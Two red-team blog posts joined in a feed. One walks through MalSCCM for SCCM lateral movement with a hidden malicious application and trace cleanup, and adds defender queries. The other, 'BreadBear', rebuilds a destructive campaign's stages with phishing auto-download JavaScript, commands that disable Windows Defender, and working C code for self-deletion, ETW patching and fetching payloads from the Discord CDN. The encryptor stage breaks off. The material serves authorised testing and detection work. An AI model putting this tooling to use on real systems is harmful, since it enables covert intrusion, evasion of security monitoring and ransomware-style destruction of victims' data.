If you run this command as an administrator of the Distribution Point server, then this will connect over WMI and attempt to enumerate the local databases. If this returns group information, then the Distribution Point is also the Primary Site.

Text Description automatically generated

In this scenario you could then do all of the SCCM exploitation remotely through MalSCCM by using the /server flag on all commands. This allows you to deploy malicious applications and laterally move without ever getting C2 on the SCCM server itself.

If the remote inspect fails or you want confirmation of the server role, then you could compromise the Distribution Point and run the locate command again on the server:

MalSCCM.exe locate

The Distribution Point will have more registry keys of interest than an endpoint client. When running locate on a Distribution Point it will tell you where it is getting its updates from, which is usually the Primary Site.

Text Description automatically generated

There are multiple registry keys enumerated because the first registry key is not present if you run the command on a Primary Site itself (if it utilises secondary sites).

This tool has not been tested on an environment with Secondary Sites configured, however it is likely that the Distribution Point would return the location of the Secondary Site, and that server would then need to be compromised to find the Primary Site in the same way.

MalSCCM Enumeration

Once the Primary Site is found, it is possible to use the inspect command within MalSCCM to gather information about the SCCM deployment through various WMI classes used by SCCM. As the information returned can be very large, the inspect command has been split into modules.

The modules at release are listed below:

  • Computers – This will return all the computers managed through SCCM. This command will return just the computer name to reduce the output.
  • Groups – This will return all of the SCCM groups. Computers in SCCM can be combined into Groups for pushing applications out, so for example you may have a group for all computers, all application servers, etc. MalSCCM will return the group names and the number of members.
  • PrimaryUser – Within SCCM it is possible to enable a setting which allows SCCM to track which users are using which machines and create an affiliation between them. Using this, it can be possible to hunt for specific users in the environment, which is very useful.
  • Forest – This will tell you the SCCM forest name.
  • Packages – This will enumerate the SCCM packages currently listed.
  • Applications – This will return the SCCM applications currently listed within SCCM.
  • Deployments – This will return the SCCM deployments within SCCM.

If you want to gather all information you can run the command:

MalSCCM.exe inspect /all /server:<PrimarySiteFQDN>

This will return all of the above information. These commands are useful for understanding various aspects of SCCM before, during and after exploitation.

Abusing SCCM for Lateral Movement

MalSCCM can be used for lateral movement through malicious SCCM applications.

Since SCCM works with the concept of groups rather than individual machines for deployments, the best way to target an individual machine is to create a new SCCM group which blends in with the existing ones and then add the target machine into that group. This allows the malicious application to be applied only to the target machine and allows for cleaning up after the attack.

The workflow of the attack is as follows:

  • Compromise a Primary Site.
  • Enumerate the Primary Site to understand which machines to target.
  • Create a new group that blends in with the current groups.
  • Add the target machine to the new group.
  • Create a malicious application.
  • Deploy the application to the group containing the target.
  • Force the target group to check in with SCCM.
  • Once laterally moved, clean up the deployment and application.
  • Delete the target group.

The functionality for all steps of the above process is within MalSCCM, allowing you to perform this chain through C2 conveniently.

To demonstrate this attack chain, the Primary Site of the lab has been compromised. To keep command lines small and screenshots readable, the C2 will be deployed on the Primary Site itself and is running with high integrity.

The computers will be enumerated to check which targets are possible through SCCM:

MalSCCM.exe inspect /computers

Text Description automatically generated

If a user was being hunted instead of a specific machine, then it may be possible to enumerate the user’s location through SCCM. Within SCCM there is an optional feature called User Device Affinity. If User Device Affinity is enabled, SCCM will track the logon sessions on each client, and if a logon session exceeds a configured amount of time it will affiliate that user with that computer. This affiliation is kept within the SCCM database and can be used by SCCM to send applications out to users by knowing which machines they are assigned to. The users affiliated with a machine are the Primary Users for that machine. There can be multiple per machine.
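For reference, these affiliations are also exposed through the site’s WMI classes, so they can be reviewed directly on the Primary Site. The following is a minimal PowerShell sketch; the SMS_UserMachineRelationship class name and its ResourceName/UniqueUserName properties are assumptions based on common SCCM tooling, so verify them against your own site:

# List user-to-device affinities recorded by SCCM (replace <SiteCode> with the site code returned by locate)
Get-WmiObject -Namespace "root\sms\site_<SiteCode>" -Query "Select ResourceName, UniqueUserName FROM SMS_UserMachineRelationship" |
    Select-Object ResourceName, UniqueUserName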

The affiliated Primary Users will be enumerated to determine if we can hunt for specific users:

MalSCCM.exe inspect /primaryusers

Text Description automatically generated

The groups will be enumerated to determine the current group names:

MalSCCM.exe inspect /groups

Text Description automatically generated

For this demonstration the goal would be to compromise the user Ben. From the Primary Users we can tell that this user often uses the machine WIN2016-SQL. This machine is managed through SCCM so we will deploy a malicious application to laterally move to the machine.

A new group will be created that blends in with the environment. Groups can either be user groups or computer groups within SCCM, so MalSCCM will allow you to create either. If you create a user group and add the target user, then SCCM will use the Primary User affiliations discussed previously to determine which machine it should deploy the application to. This could achieve the same end goal, but to manage risk and ensure the right machines are being compromised, the preference is to create a computer group.

MalSCCM.exe group /create /groupname:TargetGroup /grouptype:device

Text Description automatically generated

With the computer group created it should be listed through inspect.

MalSCCM.exe inspect /groups

Text Description automatically generated

With the group made, the target computer is added to the group. Note that if you try to use adduser instead of addhost to add a device into a device group, it will break that group and prevent deletion, so make sure you are using the right command for the resource you are adding.

MalSCCM.exe group /addhost /groupname:TargetGroup /host:WIN2016-SQL

Text Description automatically generated

This is then inspected to ensure the member count of the group increased.

MalSCCM.exe inspect /groups

Graphical user interface, text, application Description automatically generated

This group can also be seen in the SCCM console.

Graphical user interface, text, application, email Description automatically generated

A malicious application then needs to be made. For MalSCCM, the malicious application simply points to a UNC path of the binary that will be run as SYSTEM. The simplest case would be to upload a malicious EXE and use that. Since the target endpoint will run this as SYSTEM, it’s important that the malicious EXE is placed in a share that is accessible by the target computer account rather than the user.

In this case a simple dropper EXE will be uploaded to a share. When SCCM is installed, a share is exposed on Distribution Points called SCCMContentLib$. This share is readable by all users, and would be utilised by SCCM, making it an ideal place for the malicious binary.

The malicious application will then be made pointing to the malicious EXE.

MalSCCM.exe app /create /name:demoapp /uncpath:"\\BLORE-SCCM\SCCMContentLib$\localthread.exe"

Text Description automatically generated

Inspect can be used to check that the application now exists.

MalSCCM.exe inspect /applications

Text Description automatically generated

This application will be hidden from the SCCM administrative console when created through MalSCCM. This is a useful feature; however, it is also a noteworthy detection opportunity, since most legitimate applications would not be hidden.

Graphical user interface, application Description automatically generated

With the application made, it then needs to be deployed. MalSCCM can be used to create a deployment for the target group.

MalSCCM.exe app /deploy /name:demoapp /groupname:TargetGroup /assignmentname:demodeployment

Text Description automatically generated

Inspect can be used to ensure the deployment was created.

MalSCCM.exe inspect /deployments

Text Description automatically generated

This will return the deployment and the application that will be deployed with it. It should be noted that even though the application can be hidden from the SCCM console, the deployment cannot be.

Graphical user interface, application Description automatically generated

Within the deployment the application name can be seen, and there will be a link for related objects.

Chart, bar chart Description automatically generated

If you click on that application link, it will show you the malicious application.

Graphical user interface, text, application Description automatically generated

However, if you were to click out of this menu and back into applications, the application will not be found.

Graphical user interface, text, application Description automatically generated

This is an interesting case for administrators or investigators trying to determine if SCCM has been abused. Hidden applications such as these could also be found through PowerShell for investigation, discussed more at the end of this blog post.

With the deployment made, it is possible to use MalSCCM to attempt to make the target group check in.

MalSCCM.exe checkin /groupname:TargetGroup

Text Description automatically generated

This can take time for a natural check-in; however, assuming the clients are online and connected, the check-in should happen fairly quickly (within the lab this ranged from immediate to a few minutes). In this demo the time difference between the checkin command being issued and the implant coming back was just under 30 seconds.

After the application executed our EXE a new PoshC2 implant arrived!

It can be seen that the process name of the implant is localthread as that was the binary name for our dropper. It is also running as SYSTEM as expected.

The parent process of this is WmiPrvSE.exe, which is normal for activities happening through WMI connections. If SCCM abuse is suspected, then indicators of WMI activity may be useful to collect.

At this point the binary on the share can be deleted, suggesting that the binary has been copied locally on the target, as binaries in use cannot be removed. Searching for it locally on the target returned the following location on disk:

  • C:\Windows\Prefetch\LOCALTHREAD.exe-9A0EB550.pf

This prefetch file could be analysed using a tool such as PECmd (https://ericzimmerman.github.io/#!index.md), which would allow visibility of the modules loaded by the process.

Cleanup

Since lateral movement was successful, clean-up is performed. MalSCCM has a clean-up function that will attempt to look for deployments of the application and remove them.

MalSCCM.exe app /cleanup /name:demoapp

Text Description automatically generated

If multiple deployments have been performed with the same application, then this command should be run multiple times until all of the deployments and the application are removed. In this instance it was executed only once since there was only one deployment.

MalSCCM.exe inspect /deployments

Text Description automatically generated

MalSCCM.exe inspect /applications

Text Description automatically generated

With the application cleared, the target group can be deleted, reverting SCCM back to its original configuration.

MalSCCM.exe group /delete /groupname:TargetGroup

Text Description automatically generated

Checking with inspect to ensure the group is removed.

MalSCCM.exe inspect /groups

Graphical user interface Description automatically generated with medium confidence

Attack Recap

To recap the attack path and usage of MalSCCM, the steps were as follows:

  • Locate the Primary Site using MalSCCM.exe locate on a Distribution Point.
  • Enumerate the Primary Site using MalSCCM.exe inspect /all.
  • Create a new group using MalSCCM.exe group /create /groupname:<> /grouptype:device.
  • Add the target machine to the group using MalSCCM.exe group /addhost /groupname:<> /host:<>.
  • Upload a malicious binary to a share readable by Domain Computers.
  • Create a malicious application pointing to your binary using MalSCCM.exe app /create /name:<> /uncpath:<>.
  • Deploy the malicious application to the group containing your target using MalSCCM.exe app /deploy /name:<> /groupname:<> /assignmentname:<>.
  • Make the target check in to SCCM for an update using MalSCCM.exe checkin /groupname:<>.
  • Clean-up tracks using MalSCCM.exe app /cleanup /name:<>.
  • Clean-up the group using MalSCCM.exe group /delete /groupname:<>.

Protecting against SCCM Abuse

For defence teams looking to defend against this type of lateral movement the key item would be good segmentation. If an attacker can already compromise your SCCM Primary Site then they are likely already in a very privileged position within the network, and SCCM may be a target used for mass ransomware or accessing specific targets that may be well segmented in other areas.

The common architecture for SCCM relies on fewer servers and ease of access across a wide environment; however, setting up SCCM with a more segmented hierarchy forces attackers to make more hops in the network before reaching the Primary Site, which provides a greater chance of detection.

An idea for segmentation would be having a Primary Site that is only accessible on the network from Secondary Sites or Distribution Points, on the ports necessary for SCCM functionality. The Secondary Sites/Distribution Points would then sit on the network segments necessary to talk to the clients, again only exposing the ports needed for SCCM. This could then be scaled to the size of the environment, but with the same isolated design.

Administration of SCCM could then be done through Privileged Access Workstations (PAWs) with appropriate access measures. This would lock down the SCCM servers, making the jumps necessary to compromise SCCM less attractive for attackers.

Once on the SCCM server, the WMI utilities leveraged are all normal actions exposed in the SCCM console. However, there are some actions that could be points for detection:

  • New SCCM groups being created with only a few members,
  • Applications being created that are hidden (these could be enumerated through WMI and alerted on for any application with the hidden flag set),
  • Deployments being pushed to standard groups such as All Computers,
  • Locking down unsigned executables being executed on the endpoints.

PowerShell Investigation

PowerShell can be used to investigate SCCM deployments, so some useful commands are being shared here to aid defenders. These commands are all executed on the SCCM Primary Site.

To use PowerShell with SCCM you will need to first locate the site code. This can be done through the following command:

Get-WmiObject -Namespace "root\ccm" -Query "Select Name FROM SMS_Authority"

This will return SMS:<SiteCode>. This SiteCode can then be used in further WMI queries for SCCM. In this case the SiteCode is LON, so we would replace <SiteCode> in the future commands with LON.

To list all groups the following command can be used:

Get-WmiObject -Namespace "root\sms\site_<SiteCode>" -Query "Select Name,MemberCount,Comment FROM SMS_Collection"

This will return the group names, the member counts and the comment. When MalSCCM creates a group, it will do it with no comment, which may be unusual on the environment depending on the SCCM administrator’s workflow.

To list all applications and whether they are hidden or not, the following command could be used:

Get-WmiObject -Namespace "root\sms\site_<SiteCode>" -Query "Select LocalizedDisplayName, IsHidden FROM SMS_APPLICATION"

This returned Test which is a legitimate application created in the SCCM console and is not hidden. It also returned demoapp created through MalSCCM which is hidden.

To get a list of deployments the following command could be used:

Get-WmiObject -Namespace "root\sms\site_<SiteCode>" -Query "Select AssignmentName,ApplicationName,CollectionName,Enabled FROM SMS_ApplicationAssignment"

For all of these queries, it is also possible to return every attribute with SELECT * ... instead of named attributes, and then review where the results differ from the normal processes surrounding SCCM in your environment.

PowerSCCM includes more cmdlets that may be useful for investigation purposes as well.

Conclusion

SCCM is a powerful tool for administrators and can be an equally useful tool for attackers. This blog post isn't intended to suggest that there is a weakness within SCCM, only that SCCM deployments are frequently permissive, with a single SCCM instance managing all of the clients. This makes it an attractive target on engagements where server administrative privileges have been achieved but the direction towards the objective is unclear. The release of MalSCCM aims to shed some light on the risks of this attack path so that SCCM deployments are made with security in mind. Care should be taken when exploiting SCCM for lateral movement, to ensure that only the targeted machines for which authorisation has been provided are compromised.

Download MalSCCM

GitHub: https://github.com/nettitude/MalSCCM

The post Introducing MalSCCM appeared first on Nettitude Labs.

Repurposing Real TTPs for use on Red Team Engagements

7 April 2022 at 09:00

I recently read an interesting article by Elastic. It provides new analysis of a sophisticated, targeted campaign against several organizations, which has been labelled 'Bleeding Bear'. The article's analysis of Bleeding Bear tactics, techniques and procedures left me with a couple of thoughts. The first was, "hey, I can probably perform some of these techniques!" and the second was, "how can I improve on them?"

With that in mind, I decided to create a proof of concept for elements of Operation Bleeding Bear TTPs. This is not an exact replica, or even an attempt to be an exact replica, because I found a lot of the actions the threat actors were performing were unnecessary for my objectives. I dub this altered set of techniques BreadBear.

Where there are changes, I'll point them out along with the reasons for them. To help you follow along with this blog post, I have posted the code to my GitHub repository, which you are welcome to download, examine, and run. This post is separated into three distinct sections, one for each stage of the campaign: initial payload delivery, payload execution, and finally document encryption.

Stage 1 – Initial Payload and Delivery

The first section of the Bleeding Bear campaign is described as a WhisperGate MBR wiper. Essentially, this technique will make any machine affected unbootable on the next boot operation. The attackers replace the contents of the MBR with a message that usually says something along the lines of “To get your data back, send crypto currency to xyz address”. I didn’t implement this because it’s a proof of concept and I didn’t want to wreck my development VM 100 times to test this out.

Instead, I created a stage 1 as a fake phishing scenario to be the initial delivery of the payload. The payload itself is delivered via a static webpage that upon loading will execute JavaScript to automatically download the stage 2 payload. However, it’s up to the end user to click past a few different warnings to run the executable. I’d like to mention that initial payload delivery is probably my weakest point in all of this, so if you’re reading this and can think of a million ways to improve upon this technique, please reach out to me on twitter or LinkedIn with recommendations.

The initial payload delivery is facilitated by a static web page with some JavaScript that has the user automatically download the targeted file upon loading of the page. The webpage itself is hosted on IPFS (the InterPlanetary File System). Once you have IPFS installed on your system, all you need to do is import your web page's root folder to IPFS and retrieve the URL to your files. This process is very simple and looks as follows.

Once IPFS is installed, first hit Import, then Folder.

Next, when the browser window opens, you'll want to browse to your static web page's root folder. A sample provided by Black Hills Information Security is included in the GitHub repo under x64/release. With tools like zphisher you can create your own, more complex, phishing sites.

Once your folder has been imported, your files will be shared via the IPFS peer-to-peer network. Additionally, they will be reachable from a common gateway that you can set in your IPFS settings. IPFS has a list of gateways that can be used, located on this site. However, to retrieve the URL that can access your files you’ll want to right click on the folder, click share link, and then copy.

Then, all you need to do is distribute this link with the proper context for your target. When the user clicks your link, they’ll be presented with the following page:

The browser download warning presented to the target

In Chrome, if they press Keep, the file finishes downloading and is ready for execution. The JavaScript code that performs the automatic download and forces Chrome to ask whether to keep the file is shown below:

The JavaScript download snippet

An element variable is initialized to the download href tag. Then, we set the element to our executable file named MicrosoftUpdater.exe. Finally, we click the element programmatically, which starts the download process. For more information about how IPFS can be used as a malware hosting service, read this blog by Steve Borosh, who was the inspiration for the initial payload delivery.

Stage 2 – Payload Execution

Once the user has been successfully phished, phase 1 has been completed and we transition into phase 2, with the execution of stage2.exe or, in this case, the MicrosoftUpdater.exe program. In the Bleeding Bear campaign, the heavy lifting is performed by the stage2.exe binary, which uses Discord to download and execute malicious programs. My stage 2 binary also utilizes the Discord CDN to download, reflectively load, and execute stage 3. However, that’s pretty much where the comparison stops.

The stage 2 Discord downloader in the Bleeding Bear campaign downloads an obfuscated .NET assembly and uses reflection to load it. However, mine is a compiled PE binary. Additionally, the Bleeding Bear campaign performs a lot of operations which require either a UAC bypass or a UAC accept from the user to perform. These actions include writing a VBScript payload to disk which will set a Defender exclusion path on the C drive.
"C:\Windows\System32\WScript.exe""C:\Users\jim\AppData\Local\Temp\Nmddfrqqrbyjeygggda.vbs"
powershell.exe Set-MpPreference -ExclusionPath 'C:\'

Then the payload will download and run AdvancedRun in a higher integrity to stop Windows Defender and delete all files in the Windows Defender directory.

"C:\Users\jim\AppData\Local\Temp\AdvancedRun.exe" /EXEFilename "C:\Windows\System32\sc.exe" `
/WindowState 0 /CommandLine "stop WinDefend" /StartDirectory "" /RunAs 8 /Run
"C:\Users\jim\AppData\Local\Temp\AdvancedRun.exe" `
/EXEFilename "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /WindowState 0 `
/CommandLine "rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse" `
/StartDirectory "" /RunAs 8 /Run

Next, InstallUtil.exe is downloaded to the user's Temp directory. The InstallUtil program is used for process hollowing. This means that the executable is started in a suspended state, then the memory of the process is overwritten with a malicious payload which is executed instead. To the computer it will look like InstallUtil is running, when it is actually the payload. In the Bleeding Bear campaign, that malicious payload happens to be a file corruptor, which overwrites the first 1MB of every file ending in one of the following extensions with the byte 0xCC:

.3DM .3DS .602 .7Z .ACCDB .AI .ARC .ASC .ASM .ASP .ASPX .BACKUP .BAK .BAT .BMP .BRD .BZ .BZ2 .C .CGM .CLASS .CMD .CONFIG .CPP .CRT .CS .CSR .CSV .DB .DBF .DCH .DER .DIF .DIP .DJVU.SH .DOC .DOCB .DOCM .DOCX .DOT .DOTM .DOTX .DWG .EDB .EML .FRM .GIF .GO .GZ .H .HDD .HTM .HTML .HWP .IBD .INC .INI .ISO .JAR .JAVA .JPEG .JPG .JS .JSP .KDBX .KEY .LAY .LAY6 .LDF .LOG .MAX .MDB .MDF .MML .MSG .MYD .MYI .NEF .NVRAM .ODB .ODG .ODP .ODS .ODT .OGG .ONETOC2 .OST .OTG .OTP .OTS .OTT .P12 .PAQ .PAS .PDF .PEM .PFX .PHP .PHP3 .PHP4 .PHP5 .PHP6 .PHP7 .PHPS .PHTML .PL .PNG .POT .POTM .POTX .PPAM .PPK .PPS .PPSM .PPSX .PPT .PPTM .PPTX .PS1 .PSD .PST .PY .RAR .RAW .RB .RTF .SAV .SCH .SHTML .SLDM .SLDX .SLK .SLN .SNT .SQ3 .SQL .SQLITE3 .SQLITEDB .STC .STD .STI .STW .SUO .SVG .SXC .SXD .SXI .SXM .SXW .TAR .TBK .TGZ .TIF .TIFF .TXT .UOP .UOT .VB .VBS .VCD .VDI .VHD .VMDK .VMEM .VMSD .VMSN .VMSS .VMTM .VMTX .VMX .VMXF .VSD .VSDX .VSWP .WAR .WB2 .WK1 .WKS .XHTML .XLC .XLM .XLS .XLSB .XLSM .XLSX .XLT .XLTM .XLTX .XLW .YML .ZIP

I found a lot of these steps to be unnecessary; therefore, I did not perform them. I wanted to leave as little trace on the system as possible. I also didn't see a need to spawn a high integrity process to perform ancillary functions, such as deleting Windows Defender's files, when we can just bypass it. However, my stage 2 code does contain a failed UAC bypass even though it is not used.

The differences in my stage 2 and stage 3 will become apparent as we walk through the code. Before we start, I'd like to mention the features of my stage 2 so that the auxiliary function names you'll see throughout the code make sense. My stage 2 does the following:

  • Dynamically retrieves function pointers to any Windows APIs used maliciously
    • Has a custom GetProcAddress() & GetModuleHandle() implementation to retrieve function calls
    • Custom LoadLibrary() function that will dynamically retrieve the pointer to LoadLibraryW() at each run.
  • Hides the console window at startup.
  • Has a self-delete function which will delete the file on disk at runtime once the PE has been loaded into memory and executed.
  • Unhooks DLLs using the system calls for native windows APIs (using the Halo’s Gate technique).
  • Disables Event Tracing for Windows (ETW).
  • Uses a simple XOR decrypt function to decrypt strings such as Discord CDN URLs at runtime.
  • Performs a web request to Discord CDN using Windows APIs to retrieve stage3 in a base64 encoded format.
  • Reflectively loads a stage 3 payload in memory and executes.
  • Lazy attempts at string obfuscation.

With that said, I will only cover techniques I found particularly interesting or important in this blog post for brevity.

Stage 2 main(): the dynamically resolved ShowWindow() call followed by SelfDelete()

First, we see a dynamically resolved ShowWindow() used to hide the window. Next, we see SelfDelete(), which will delete the file from disk even while the executable is still running. I believe this function is a neat trick and worth going over.

First, we dynamically resolve pointers to the Windows APIs CloseHandle(), SetFileInformationByHandle(), CreateFileW(), and GetModuleFileNameW(). Following that we create some variables to store necessary information.

Next, we resolve the path that our stage 2 was downloaded to on disk using GetModuleFileNameW(). We then obtain a handle to stage 2 using CreateFileW() and the OPEN_EXISTING flag. We create a FILE_RENAME_INFO structure and populate it with the rename string ":breadman" and a flag to replace the file if it already exists. We then call SetFileInformationByHandle() using our file handle, our rename information structure, and the FileRenameInfo information class. Renaming the file's stream in this way is what allows us to delete the file on disk, because the file lock now applies to the renamed handle; we can then reopen a handle to the original file on disk and delete it. Thus, we close our handle and reopen it using the original file path. We then call SetFileInformationByHandle() again with a FILE_DISPOSITION_INFO structure and its delete flag set to true. Finally, we close our file handle, which causes the file to be deleted from disk, and we continue our code execution back in main().
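
For reference, here is a minimal standalone sketch of that rename-then-delete trick. It uses direct API calls rather than the dynamically resolved pointers the real stage 2 uses, the ":breadman" stream name simply mirrors the write-up above, and error handling is reduced for brevity.

#include <windows.h>
#include <stdlib.h>
#include <string.h>

// Rename the running executable's primary data stream to ":breadman", then
// reopen the original path and set the delete disposition so the file is
// removed from disk when the final handle is closed.
BOOL SelfDelete(void)
{
    WCHAR path[MAX_PATH] = { 0 };
    const WCHAR stream[] = L":breadman";

    if (!GetModuleFileNameW(NULL, path, MAX_PATH))
        return FALSE;

    SIZE_T size = sizeof(FILE_RENAME_INFO) + sizeof(stream);
    FILE_RENAME_INFO *rename = (FILE_RENAME_INFO *)calloc(1, size);
    rename->ReplaceIfExists = TRUE;
    rename->FileNameLength = sizeof(stream) - sizeof(WCHAR);
    memcpy(rename->FileName, stream, sizeof(stream));

    // Rename the primary :$DATA stream while the image is still running.
    HANDLE hFile = CreateFileW(path, DELETE | SYNCHRONIZE, FILE_SHARE_READ,
                               NULL, OPEN_EXISTING, 0, NULL);
    SetFileInformationByHandle(hFile, FileRenameInfo, rename, (DWORD)size);
    CloseHandle(hFile);

    // Reopen the original path and mark it for deletion; closing the handle
    // removes the file from disk even though the image is still mapped.
    FILE_DISPOSITION_INFO dispose = { TRUE };
    hFile = CreateFileW(path, DELETE | SYNCHRONIZE, FILE_SHARE_READ,
                        NULL, OPEN_EXISTING, 0, NULL);
    SetFileInformationByHandle(hFile, FileDispositionInfo, &dispose, sizeof(dispose));
    CloseHandle(hFile);

    free(rename);
    return TRUE;
}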

With that done, we perform the unhooking of our DLLs using System Calls and Native APIs to bypass AV/EDR hooking. I won’t cover this in depth, however, the same exact code is used in another of my blog posts.

The next important functions in main() are disabling event tracing for windows and decrypting the encrypted Discord CDN strings.

Disabling Event Tracing for Windows is simple (function template credit to the Sektor7 Institute):

The ETW patching function

First, we obtain a pointer to the EtwEventWrite() function in ntdll.dll. Then we change the memory protection of its page to execute+read+write and copy the four bytes equivalent to xor rax, rax ; ret over the start of the function. This sets the function's return value to zero (indicating success) and returns immediately, so the function does nothing, and Event Tracing for Windows is effectively disabled.
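
As an illustration, a minimal sketch of that patch might look like the following. It assumes the EtwEventWrite export and x64 byte values for xor rax, rax ; ret; it is not the implant's exact code.

#include <windows.h>
#include <string.h>

// Overwrite the start of ntdll!EtwEventWrite with "xor rax, rax ; ret" so it
// returns success without emitting any events (x64 only).
BOOL PatchEtw(void)
{
    unsigned char patch[] = { 0x48, 0x33, 0xC0, 0xC3 };   // xor rax, rax ; ret
    DWORD oldProtect = 0;

    void *pEtwEventWrite = (void *)GetProcAddress(GetModuleHandleA("ntdll.dll"), "EtwEventWrite");
    if (!pEtwEventWrite)
        return FALSE;

    if (!VirtualProtect(pEtwEventWrite, sizeof(patch), PAGE_EXECUTE_READWRITE, &oldProtect))
        return FALSE;

    memcpy(pEtwEventWrite, patch, sizeof(patch));

    // Restore the original protection and flush the instruction cache.
    VirtualProtect(pEtwEventWrite, sizeof(patch), oldProtect, &oldProtect);
    FlushInstructionCache(GetCurrentProcess(), pEtwEventWrite, sizeof(patch));
    return TRUE;
}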

I won’t go over the XOR decryption since it’s a rudimentary technique. However, I will go over how you can use Discord CDN as a MDN ‘Malware Distribution Network’.

In Discord, anyone can create their own private server and upload files, messages, pictures and so on to it. However, access to anything uploaded, even to a private server, does not require authentication. One caveat to keep in mind is that executables need to be converted to a base64 string first: when I uploaded executables directly, I ran into problems (likely compression) where the file downloaded via the APIs was smaller than the one I downloaded manually from the CDN. The same problem did not occur with text files. Therefore, I put the base64 encoded PE file into a text file and downloaded that instead. This looks like the following:

The base64-encoded payload uploaded to a private Discord channel as a text file

Once you’ve uploaded the file, you can right click the download link at the bottom of the above screenshot, then select Copy Link.

Once that has been completed, you have your Discord CDN URL that is accessible from anywhere in the world without authentication. Additionally, these URLs are valid forever even if the file has been deleted from the server.

It’s as simple as that. Obviously, there might be some red team infrastructure you’d want to standup in-between the CDN and the target host to redirect any potential security analysts who go snooping, but it’s an effective method for serving up malware.

Next, to finish up main(), we perform the following tasks. We first parse our Discord CDN URL that was just decrypted into separate parts. Then we perform a request to download our targeted file by calling the do_request() function using the parsed URL pieces.

We open the do_request() function by dynamically resolving pointers to any Windows APIs we will use to perform the HTTPS request to Discord. We then follow that up by initializing variables we’re going to use as parameters to the following WinInet function calls.

The WinInet calls used by do_request() to retrieve stage 3 from the Discord CDN

There aren't too many interesting pieces of information regarding our Internet API calls, aside from the InternetOpenA() and HttpOpenRequestA() calls. For the first, we specify INTERNET_OPEN_TYPE_DIRECT to ensure that no proxy is used; the default option could be used here instead to pick up the system's proxy settings. Additionally, for HttpOpenRequestA() we specify the INTERNET_FLAG_NO_CACHE_WRITE flag to ensure the call doesn't cache the downloaded file in %LocalAppData%\Microsoft\Windows\INetCache. Next, we make a call to HttpQueryInfoA() with the HTTP_QUERY_CUSTOM flag, which lets us read the value of a specific HTTP response header from the request we just made. The header name is passed to do_request() from main() and is the content length header; we will use this value to allocate memory for the stage 3 payload that was just downloaded.

We now allocate memory for our downloaded file using malloc() and the size of our content length value. Following that, we make a call to InternetReadFile() function to load the base64 encoded data into our allocated memory space. Once it has been successfully loaded, we make a call to pCryptStringToBinaryW(), which will convert our base64 encoded data into the byte code that makes up our stage 3 payload. We then free the allocated memory region and call the final function of do_request() which is reflectiveLoader().
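
To make the flow above concrete, here is a condensed sketch of a do_request()-style download. The host and object path parameters are illustrative, the APIs are called directly rather than through dynamically resolved pointers, and the standard Content-Length query is used in place of the custom header query described above.

#include <windows.h>
#include <wininet.h>
#include <wincrypt.h>
#include <stdlib.h>

#pragma comment(lib, "wininet.lib")
#pragma comment(lib, "crypt32.lib")

// Download a base64-encoded payload over HTTPS and decode it into raw bytes.
// Returns a heap buffer the caller must free, or NULL on failure.
unsigned char *DownloadStage3(const char *host, const char *object, DWORD *outLen)
{
    unsigned char *stage3 = NULL;
    char *b64 = NULL;
    char contentLength[32] = { 0 };
    DWORD clSize = sizeof(contentLength), read = 0, total = 0, b64Len = 0;

    HINTERNET hInet = InternetOpenA("Mozilla/5.0", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
    HINTERNET hConn = InternetConnectA(hInet, host, INTERNET_DEFAULT_HTTPS_PORT,
                                       NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);
    HINTERNET hReq  = HttpOpenRequestA(hConn, "GET", object, NULL, NULL, NULL,
                                       INTERNET_FLAG_SECURE | INTERNET_FLAG_NO_CACHE_WRITE, 0);
    if (!hReq || !HttpSendRequestA(hReq, NULL, 0, NULL, 0))
        goto cleanup;

    // Read the Content-Length header so we know how much memory to allocate.
    if (!HttpQueryInfoA(hReq, HTTP_QUERY_CONTENT_LENGTH, contentLength, &clSize, NULL))
        goto cleanup;
    b64Len = (DWORD)atoi(contentLength);

    // Pull down the base64 text hosted on the CDN.
    b64 = (char *)malloc(b64Len + 1);
    while (InternetReadFile(hReq, b64 + total, b64Len - total, &read) && read)
        total += read;
    b64[total] = '\0';

    // Decode the base64 text back into the raw PE bytes.
    CryptStringToBinaryA(b64, total, CRYPT_STRING_BASE64, NULL, outLen, NULL, NULL);
    stage3 = (unsigned char *)malloc(*outLen);
    CryptStringToBinaryA(b64, total, CRYPT_STRING_BASE64, stage3, outLen, NULL, NULL);

cleanup:
    free(b64);
    if (hReq)  InternetCloseHandle(hReq);
    if (hConn) InternetCloseHandle(hConn);
    if (hInet) InternetCloseHandle(hInet);
    return stage3;
}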

I won’t go over the reflective loading / execution of our PE File in memory because I’ve written a previous blog post about it already. However, I used the code from this resource as the base of my loader.

Stage 3 – File Corruptor

Stage 3 probably has the biggest differences in functionality from the Bleeding Bear campaign. The stage 3 of the Bleeding Bear campaign is a "File Corruptor", not an encryption scheme. This means that the Bleeding Bear campaign's third stage will overwrite the first 1MB of data of all files it finds on disk that are not critical to system operation. If a file is smaller than 1MB, it will overwrite the whole file and pad out the difference to make a 1MB file. As far as I know, the campaign does not download the unaffected files before overwriting, therefore all data will be lost. This file corruptor is also not a reflectively loaded PE file. Instead, the file corruptor is likely a piece of shellcode that is executed via a process hollowing technique. The stage 2 of the Bleeding Bear campaign downloads InstallUtil.exe to disk, executes it in a suspended state, overwrites the process memory with the corruptor shellcode, and then resumes the process execution.

The BreadBear technique uses a file encryptor rather than a corruptor. I decided to use an encryptor because eventually I plan to add the functionality of downloading the unencrypted data, the keys used to encrypt the file, and to add a decryption function. I believe this would be beneficial to clients who want to test against a simulated ransomware campaign. Additionally, since I am reflectively loading the stage 3 executable in memory, there’s no need to perform process hollowing, or even writing the InstallUtil binary to disk. I believe my approach is more operationally secure than the Bleeding Bear’s alternative.

Additionally, with my approach you can swap out your stage 3 from file encryptor to implant shellcode. I have successfully tested my stage 3 payload with the binary from my previous blog post BreadMan Module Stomping. The only requirement for the reflective loading is that the file chosen is compiled in a valid PE format.

With that being said, let’s dive into stage 3: the file encryptor.

I would like to note that no attempts at obfuscation or evasion were made in the stage 3 payload. This is because it is loaded into a process memory space that has already been unhooked from AV/EDR and had ETW patched out, so it is not needed.

In main(), all we do is call the encryptDirectory() function with the argument of our target directory. Note, that since this is a proof of concept, I did not implement functionality to encrypt entire drives.

encryptDirectory() starts by initializing a variable called tmpDirectory to hold a new directory path. We append "\\*" to our target directory to indicate that we want to retrieve all files. Then, we initialize a WIN32_FIND_DATAW structure and a file handle variable.

Next, we call FindFirstFileW() using the target directory and our FIND_DATAW variables as parameters. Then, we create a linked list of directories.

